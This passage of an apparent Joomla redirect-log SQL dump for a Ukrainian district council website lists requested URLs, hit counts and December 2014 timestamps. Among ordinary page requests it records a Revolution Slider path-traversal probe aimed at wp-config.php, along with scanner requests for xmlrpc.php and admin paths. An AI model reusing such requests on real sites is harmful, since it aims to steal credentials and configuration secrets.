00:00:00',301),(11910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',1,0,'2014-12-08 13:02:26','0000-00-00 00:00:00',301),(11911,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',1,0,'2014-12-08 13:02:28','0000-00-00 00:00:00',301),(11912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',1,0,'2014-12-08 13:02:30','0000-00-00 00:00:00',301),(11913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',5,0,'2014-12-08 13:02:35','0000-00-00 00:00:00',301),(11914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',9,0,'2014-12-08 13:02:37','0000-00-00 00:00:00',301),(11915,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=ru','','','',1,0,'2014-12-08 13:02:41','0000-00-00 00:00:00',301),(11916,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=uk','','','',1,0,'2014-12-08 13:02:44','0000-00-00 00:00:00',301),(11917,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1089:-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-08 13:25:39','0000-00-00 00:00:00',301),(11918,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&lang=ru&option=com_content&view=article','','','',5,0,'2014-12-08 13:40:54','0000-00-00 00:00:00',301),(11919,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/138-pro-rezervuvannja-zemel','',4,0,'2014-12-08 14:45:18','0000-00-00 00:00:00',301),(11920,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1173:2014-01-15-10-37-18&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-08 15:15:37','0000-00-00 00:00:00',301),(11921,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-08 15:15:39','0000-00-00 00:00:00',301),(11922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1257:2014-03-29-18-03-31&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-08 15:15:50','0000-00-00 00:00:00',301),(11923,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1156:2013-12-09-07-12-03&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-08 16:50:15','0000-00-00 00:00:00',301),(11924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1174:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-08 21:34:21','0000-00-00 00:00:00',301),(11925,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1199:-l-r-&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-09 03:51:55','0000-00-00 00:00:00',301),(11926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=ru','','','',1,0,'2014-12-09 05:07:47','0000-00-00 00:00:00',301),(11927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56:--03022014-&Itemid=97&lang=en','','','',1,0,'2014-12-09 05:08:10','0000-00-00 00:00:00',301),(11928,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1039:---------------l-r&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-09 05:26:06','0000-00-00 00:00:00',301),(11929,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1320:-15-2010-12-l-r&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-09 05:26:17','0000-00-00 00:00:00',301),(11930,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1261:2014-03-31-11-35-31&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-09 05:45:46','0000-00-00 00:00:00',301),(11931,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-09 08:34:42','0000-00-00 00:00:00',301),(11932,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1211:-2014-&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-09 08:34:48','0000-00-00 00:00:00',301),(11933,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=976:2013-03-21-18-42-06&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-09 08:47:27','0000-00-00 00:00:00',301),(11934,'http://www.malyn-rayrada.org.ua/index.php?Itemid=10&id=1&lang=ru&layout=blog&option=com_content&view=category','','','',4,0,'2014-12-09 13:17:52','0000-00-00 00:00:00',301),(11935,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1025:------------2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-09 14:52:22','0000-00-00 00:00:00',301),(11936,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1059:2013-07-24-05-42-15&lang=en&option=com_content&view=article','','','',1,0,'2014-12-09 14:52:28','0000-00-00 00:00:00',301),(11937,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1018:2013-06-06-11-22-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-09 14:52:31','0000-00-00 00:00:00',301),(11938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-12-09 16:29:22','0000-00-00 00:00:00',301),(11939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=ru&Itemid=','','','',4,0,'2014-12-09 18:07:42','0000-00-00 00:00:00',301),(11940,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1219:-2004-&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-09 20:20:04','0000-00-00 00:00:00',301),(11941,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=971:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-09 21:10:49','0000-00-00 00:00:00',301),(11942,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&lang=uk&option=com_content&view=article','','','',7,0,'2014-12-09 22:19:10','0000-00-00 00:00:00',301),(11943,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=991:2013-04-22-08-24-54&lang=en&option=com_content&view=article','','','',1,0,'2014-12-09 22:44:56','0000-00-00 00:00:00',301),(11944,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1007:-4-&lang=en&option=com_content&view=article','','','',1,0,'2014-12-10 00:19:34','0000-00-00 00:00:00',301),(11945,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1179:2014-01-21-12-44-04&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-10 01:54:46','0000-00-00 00:00:00',301),(11946,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55:--26122013-&id=1168:2014-01-08-07-14-14&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-10 02:23:03','0000-00-00 00:00:00',301),(11947,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=986:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-10 05:03:37','0000-00-00 00:00:00',301),(11948,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=uk&Itemid=','','','',1,0,'2014-12-10 05:36:41','0000-00-00 00:00:00',301),(11949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1010:-22-6-&lang=ru&option=com_content&view=article','','','',4,0,'2014-12-10 06:38:34','0000-00-00 00:00:00',301),(11950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1375:-33-6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-10 07:25:39','0000-00-00 00:00:00',301),(11951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-12-10 07:40:50','0000-00-00 00:00:00',301),(11952,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1194:-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-10 09:47:46','0000-00-00 00:00:00',301),(11953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-12-10 11:39:43','0000-00-00 00:00:00',301),(11954,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/81-rishennja-prijnjati-na-4-sesii-malinskoi-rajonnoi','',1,0,'2014-12-10 13:52:33','0000-00-00 00:00:00',301),(11955,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/73-pro-obrannja-golovi-rajonnoi-radi','',4,0,'2014-12-10 15:09:54','0000-00-00 00:00:00',301),(11956,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1369:-lr-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-10 18:05:42','0000-00-00 00:00:00',301),(11957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11&lang=ru&Itemid=','','','',4,0,'2014-12-10 18:08:30','0000-00-00 00:00:00',301),(11958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:----------------------2013-2017-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-12-11 04:13:33','0000-00-00 00:00:00',301),(11959,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/ochishchennya-vladi/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/ochishchennya-vladi/954-perevirka-burkush-m-v','',12,0,'2014-12-11 10:42:08','0000-00-00 00:00:00',301),(11960,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku','',14,0,'2014-12-11 12:17:57','0000-00-00 00:00:00',301),(11961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-12-11 13:11:56','0000-00-00 00:00:00',301),(11962,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/ochishchennya-vladi/954-perevirka-burkush-m-v','','','',3,0,'2014-12-11 19:04:08','0000-00-00 00:00:00',301),(11963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=ru&Itemid=','','','',5,0,'2014-12-11 19:07:29','0000-00-00 00:00:00',301),(11964,'http://malyn-rayrada.org.ua/index.php/deputatska-storinka/ochishchennya-vladi/954-perevirka-burkush-m-v','','','',1,0,'2014-12-11 19:17:35','0000-00-00 00:00:00',301),(11965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-11 20:21:28','0000-00-00 00:00:00',301),(11966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=uk&Itemid=','','','',4,0,'2014-12-12 00:48:36','0000-00-00 00:00:00',301),(11967,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1102:2013-10-03-08-08-33&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-12 02:10:53','0000-00-00 00:00:00',301),(11968,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/ochishchennya-vladi/954-perevirka-burkush-m-v?tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-12-12 05:12:33','0000-00-00 00:00:00',301),(11969,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1247:2014-03-20-14-37-15&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-12 08:23:06','0000-00-00 00:00:00',301),(11970,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1112:2013-10-23-09-24-43&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-12 09:56:06','0000-00-00 00:00:00',301),(11971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-12-12 12:45:47','0000-00-00 00:00:00',301),(11972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=uk','','','',6,0,'2014-12-12 23:42:31','0000-00-00 00:00:00',301),(11973,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',16,0,'2014-12-13 14:22:58','0000-00-00 00:00:00',301),(11974,'http://malyn-rayrada.org.ua/manager/','','','',1,0,'2014-12-13 15:25:23','0000-00-00 00:00:00',301),(11975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:------------2013--&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-12-13 15:58:56','0000-00-00 00:00:00',301),(11976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-12-14 02:14:52','0000-00-00 00:00:00',301),(11977,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1142:-l-r-&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-14 05:51:46','0000-00-00 00:00:00',301),(11978,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=ru','','','',2,0,'2014-12-14 09:08:11','0000-00-00 00:00:00',301),(11979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-12-14 10:10:34','0000-00-00 00:00:00',301),(11980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-12-14 14:03:06','0000-00-00 00:00:00',301),(11981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-12-14 14:55:01','0000-00-00 00:00:00',301),(11982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-12-14 17:58:03','0000-00-00 00:00:00',301),(11983,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=962:-2017-&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-15 06:22:54','0000-00-00 00:00:00',301),(11984,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/25-pro-zatverdzhennja-pereliku-ob%E2%80%99ektiv-spilnoi','',4,0,'2014-12-15 08:53:45','0000-00-00 00:00:00',301),(11985,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1363:--qq&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-15 12:24:10','0000-00-00 00:00:00',301),(11986,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1198:2014-01-31-07-37-58&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?gp=789708&q=%D0%BF%D0%BE%D1%80%D1%8F%D0%B4%D0%BE%D0%BA+%D0%B7%D0%B0%D1%82%D0%B2%D0%B5%D1%80%D0%B4%D0%B6%D0%B5%D0%BD%D0%BD%D1%','',1,0,'2014-12-15 17:08:30','0000-00-00 00:00:00',301),(11987,'http://www.malyn-rayrada.org.ua/xmlrpc.php','','','',50,0,'2014-12-15 21:19:47','0000-00-00 00:00:00',301),(11988,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1117:--------l-r----&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-16 01:20:46','0000-00-00 00:00:00',301),(11989,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6&layout=blog&Itemid=9&lang=ru','','','',1,0,'2014-12-16 18:12:18','0000-00-00 00:00:00',301),(11990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-12-16 19:38:30','0000-00-00 00:00:00',301),(11991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=10&lang=uk','','','',13,0,'2014-12-17 02:56:23','0000-00-00 00:00:00',301),(11992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',7,0,'2014-12-17 04:30:09','0000-00-00 00:00:00',301),(11993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1295:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-12-17 08:55:21','0000-00-00 00:00:00',301),(11994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-12-18 03:17:40','0000-00-00 00:00:00',301),(11995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk&Itemid=','','','',3,0,'2014-12-18 03:21:33','0000-00-00 00:00:00',301),(11996,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1318:-3110&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-18 17:01:13','0000-00-00 00:00:00',301),(11997,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1102:2013-10-03-08-08-33&lang=ru&option=com_content&view=article','','','',3,0,'2014-12-19 16:02:34','0000-00-00 00:00:00',301),(11998,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1243:2014-03-17-07-32-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-20 23:42:54','0000-00-00 00:00:00',301),(11999,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=uk&layout=default&page&print=1&tmpl=component&view=article','','http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1125:2013-10-31-07-20-16&lang=uk&layout=default&page&print=1&tmpl=component&','',3,0,'2014-12-21 06:49:09','0000-00-00 00:00:00',301),(12000,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/968-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014','',82,0,'2014-12-21 09:48:38','0000-00-00 00:00:00',301),(12001,'http://malyn-rayrada.org.ua/media/editors/tinymce/themes/','','','',1,0,'2014-12-21 14:19:50','0000-00-00 00:00:00',301),(12002,'http://malyn-rayrada.org.ua/media/editors/tinymce/plugins/','','','',1,0,'2014-12-21 14:19:49','0000-00-00 00:00:00',301),(12003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-qq&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-12-21 18:31:02','0000-00-00 00:00:00',301),(12004,'http://malyn-rayrada.org.ua/index.php/958-do-vidoma-deputativ-rajonnoji-radi','','','',8,0,'2014-12-21 20:40:05','0000-00-00 00:00:00',301),(12005,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1183:2014-01-28-09-18-31&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-22 09:39:33','0000-00-00 00:00:00',301),(12006,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1015:-200-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-23 01:22:42','0000-00-00 00:00:00',301),(12007,'http://malyn-rayrada.org.ua/magaza/index.php','','','',5,0,'2014-12-23 13:08:22','0000-00-00 00:00:00',301),(12008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=uk+Result:+','','http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=uk+Result:+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4','',1,0,'2014-12-23 23:32:57','0000-00-00 00:00:00',301),(12009,'http://www.malyn-rayrada.org.ua/index.php/915-ogoloshennya-shchodo-orendi-komunalnogo-majna','','','',27,0,'2014-12-24 08:06:17','0000-00-00 00:00:00',301),(12010,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1073:2013-08-30-11-12-19&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-24 22:57:05','0000-00-00 00:00:00',301),(12011,'http://malyn-rayrada.org.ua/index.php/907-do-vidoma-deputativ-rajonnoji-radi','','','',5,0,'2014-12-25 02:54:05','0000-00-00 00:00:00',301),(12012,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1084:-qq&lang=uk&option=com_content&view=article','','','',4,0,'2014-12-25 17:48:50','0000-00-00 00:00:00',301),(12013,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1012:l-r&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-25 19:19:05','0000-00-00 00:00:00',301),(12014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52&Itemid=93&lang=uk','','','',1,0,'2014-12-25 22:29:54','0000-00-00 00:00:00',301),(12015,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=uk&Itemid=','','','',4,0,'2014-12-26 04:21:34','0000-00-00 00:00:00',301),(12016,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1314:2014-05-14-11-53-26&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-26 09:50:12','0000-00-00 00:00:00',301),(12017,'http://www.malyn-rayrada.org.ua/ru/index.php','','','',2,0,'2014-12-26 12:42:55','0000-00-00 00:00:00',301),(12018,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1049:2013-07-15-05-50-46&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-26 12:54:08','0000-00-00 00:00:00',301),(12019,'http://malyn-rayrada.org.ua/index.php?Itemid=8&id=4:2010-06-05-12-51-18&lang=en&layout=blog&option=com_content&view=category','','','',4,0,'2014-12-26 14:35:20','0000-00-00 00:00:00',301),(12020,'http://www.malyn-rayrada.org.ua/undefined','','','',1,0,'2014-12-26 17:21:51','0000-00-00 00:00:00',301),(12021,'http://malyn-rayrada.org.ua/index.php','','','',7,0,'2014-12-26 18:28:57','0000-00-00 00:00:00',301),(12022,'http://www.malyn-rayrada.org.ua/index.php/images/stories/vush77.jpg','','','',1,0,'2014-12-26 20:03:22','0000-00-00 00:00:00',301),(12023,'http://www.malyn-rayrada.org.ua/index.php/images/stories/samila_320x240.jpg','','','',1,0,'2014-12-26 20:03:42','0000-00-00 00:00:00',301),(12024,'http://www.malyn-rayrada.org.ua/index.php/images/stories/timo_1.jpg','','','',1,0,'2014-12-26 20:04:01','0000-00-00 00:00:00',301),(12025,'http://www.malyn-rayrada.org.ua/index.php/images/stories/demsk.jpg','','','',1,0,'2014-12-26 20:04:21','0000-00-00 00:00:00',301),(12026,'http://www.malyn-rayrada.org.ua/index.php/images/stories/sssrv.jpg','','','',1,0,'2014-12-26 20:04:40','0000-00-00 00:00:00',301),(12027,'http://www.malyn-rayrada.org.ua/index.php/images/stories/kursa77.jpg','','','',1,0,'2014-12-26 20:30:53','0000-00-00 00:00:00',301),(12028,'http://www.malyn-rayrada.org.ua/index.php/images/stories/kamen176x144.jpg','','','',1,0,'2014-12-26 20:57:46','0000-00-00 00:00:00',301),(12029,'http://www.malyn-rayrada.org.ua/economy/index.php','','','',1,0,'2014-12-26 21:10:22','0000-00-00 00:00:00',301),(12030,'http://www.malyn-rayrada.org.ua/index.php/images/stories/lakei.jpg','','','',2,0,'2014-12-26 21:18:55','0000-00-00 00:00:00',301),(12031,'http://www.malyn-rayrada.org.ua/index.php/images/stories/gorin.jpg','','','',1,0,'2014-12-26 21:20:03','0000-00-00 00:00:00',301),(12032,'http://www.malyn-rayrada.org.ua/index.php/images/stories/golovki.jpg','','','',1,0,'2014-12-26 21:20:27','0000-00-00 00:00:00',301),(12033,'http://www.malyn-rayrada.org.ua/index.php/images/stories/luki77.jpg','','','',2,0,'2014-12-26 21:49:42','0000-00-00 00:00:00',301),(12034,'http://www.malyn-rayrada.org.ua/index.php/images/stories/barv_nedashk.JPG','','','',2,0,'2014-12-26 22:07:11','0000-00-00 00:00:00',301),(12035,'http://www.malyn-rayrada.org.ua/index.php/images/stories/slob77.jpg','','','',1,0,'2014-12-26 22:09:28','0000-00-00 00:00:00',301),(12036,'http://www.malyn-rayrada.org.ua/index.php/images/stories/iosifka.jpg','','','',2,0,'2014-12-26 22:11:46','0000-00-00 00:00:00',301),(12037,'http://www.malyn-rayrada.org.ua/index.php/images/stories/ustin77.jpg','','','',2,0,'2014-12-26 22:14:01','0000-00-00 00:00:00',301),(12038,'http://www.malyn-rayrada.org.ua/index.php/images/stories/chop_filon.jpg','','','',2,0,'2014-12-26 22:15:58','0000-00-00 00:00:00',301),(12039,'http://www.malyn-rayrada.org.ua/index.php/images/stories/moroz.jpg','','','',1,0,'2014-12-26 22:18:52','0000-00-00 00:00:00',301),(12040,'http://www.malyn-rayrada.org.ua/index.php/images/stories/maevsk.jpg','','','',1,0,'2014-12-26 22:21:10','0000-00-00 00:00:00',301),(12041,'http://www.malyn-rayrada.org.ua/index.php/images/stories/garachc.jpg','','','',1,0,'2014-12-26 23:16:17','0000-00-00 00:00:00',301),(12042,'http://www.malyn-rayrada.org.ua/index.php/images/stories/vors_11.jpg','','','',1,0,'2014-12-27 02:20:14','0000-00-00 00:00:00',301),(12043,'http://www.malyn-rayrada.org.ua/index.php/images/stories/nedashki77.jpg','','','',1,0,'2014-12-27 03:52:38','0000-00-00 00:00:00',301),(12044,'http://www.malyn-rayrada.org.ua/index.php/images/stories/bud77.jpg','','','',1,0,'2014-12-27 03:55:13','0000-00-00 00:00:00',301),(12045,'http://www.malyn-rayrada.org.ua/index.php/images/stories/golovki77.jpg','','','',1,0,'2014-12-27 03:57:50','0000-00-00 00:00:00',301),(12046,'http://www.malyn-rayrada.org.ua/index.php/images/stories/savchenko77.jpg','','','',1,0,'2014-12-27 03:59:03','0000-00-00 00:00:00',301),(12047,'http://www.malyn-rayrada.org.ua/forum/index.php','','','',2,0,'2014-12-27 04:48:11','0000-00-00 00:00:00',301),(12048,'http://www.malyn-rayrada.org.ua/index.php/images/stories/ivanivka77.jpg','','','',1,0,'2014-12-27 05:14:28','0000-00-00 00:00:00',301),(12049,'http://www.malyn-rayrada.org.ua/index.php/images/stories/melnik.jpg','','','',1,0,'2014-12-27 06:26:55','0000-00-00 00:00:00',301),(12050,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1092:2013-09-19-12-18-37&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-27 13:10:34','0000-00-00 00:00:00',301),(12051,'http://www.malyn-rayrada.org.ua/content/index.php','','','',1,0,'2014-12-27 17:34:26','0000-00-00 00:00:00',301),(12052,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=986:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-27 19:58:22','0000-00-00 00:00:00',301),(12053,'http://malyn-rayrada.org.ua/index.php/918-shchodo-orendi-komunalnogo-majna','','','',6,0,'2014-12-27 23:20:17','0000-00-00 00:00:00',301),(12054,'http://malyn-rayrada.org.ua/index.php/915-ogoloshennya-shchodo-orendi-komunalnogo-majna','','','',5,0,'2014-12-27 23:23:01','0000-00-00 